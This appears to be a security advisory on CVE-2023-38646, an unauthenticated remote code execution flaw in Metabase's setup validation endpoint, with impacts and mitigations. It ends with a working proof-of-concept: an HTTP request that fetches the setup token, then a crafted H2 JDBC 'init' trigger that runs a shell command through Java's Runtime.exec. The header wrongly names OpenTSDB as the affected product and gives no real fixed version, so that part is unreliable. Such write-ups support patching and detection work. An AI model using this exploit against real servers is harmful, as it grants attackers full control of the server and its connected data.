Vulnerable Version
OpenTSDB <= 2.4.1
Fixed Version
UPdate latest Versions
Base Score
9.8 critical
Vendor Description:-
Metabase is an open-source business intelligence (BI) and analytics platform that aims to make data discovery simple and accessible. It enables users to connect to several databases, build visual dashboards, and generate insights without requiring much technical knowledge. Teams may easily analyze data by writing SQL queries or using a graphical query builder. Metabase is extensively used for self-service analytics because it reduces the need for complex configurations and allows non-technical people to interact with data simply. It is accessible in both free community and enterprise editions, which include sophisticated capabilities for large businesses.
CVE-2023-38646 Description
CVE-2023-38646 originates from the “/api/setup/validate” endpoint during Metabase installation. This endpoint validates a JDBC connection before allowing any further setup. The security flaw is the result of a logic error during the validation process, specifically the handling of certain fault scenarios. Attackers can exploit this problem by creating a malicious JDBC URL with specially designed characters that cause unexpected code execution on the Metabase server. This execution bypasses all authentication checks, giving the attacker unfettered control of the compromised machine.
Impact
- Full Server Access: Once attackers have full access to the server, they can steal sensitive data such as user credentials, corporate reports, and secret information contained in connected databases.
- Malware Deployment: Malicious malware can be deployed to encrypt data, disrupt services, or commandeer resources for cybercriminal purposes such as bitcoin mining.
- Lateral Movement: The hacked server can act as a springboard for lateral movement inside the network, potentially compromising other connected systems and infrastructure.
- Data manipulation: Attackers can tamper with or fake data on Metabase dashboards, resulting in faulty analysis and potentially detrimental decision-making based on altered information.
Mitigaitons:
- Disable Unused Features: If not in use, disable the Metabase setup API to reduce the attack surface.
- Network Segmentation: Keep Metabase servers separate from key databases and sensitive data sources to prevent potential damage in the event of a hack.
- Access Control: Use rigorous access controls to limit user privileges and Metabase capabilities.
- Regular Backups: Make regular backups of your Metabase database and linked systems to aid in data recovery in the event of an attack.
- Intrusion Detection and Monitoring: Use intrusion detection and monitoring systems to identify suspicious behavior and probable compromise attempts.
POC
First, use the following request to retrieve the setup-token.
GET /api/session/properties HTTP/1.1
Host: localhost:3000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Connection: close
Cache-Control: max-age=0
The vulnerability can only be exploited with this setup token. Second, replace your [setup-token] with the following request and send it:
POST /api/setup/validate HTTP/1.1
Host: localhost:3000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 739
{
"token": "[setup-token]",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;",
"advanced-options": false,
"ssl": true,
"init": "CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\u000A\u0009java.lang.Runtime.getRuntime().exec('touch /tmp/success')\u000A$$"
},
"name": "an-sec-research-team",
"engine": "h2"
}
}
As you can see, touch /tmp/success was conducted successfully.
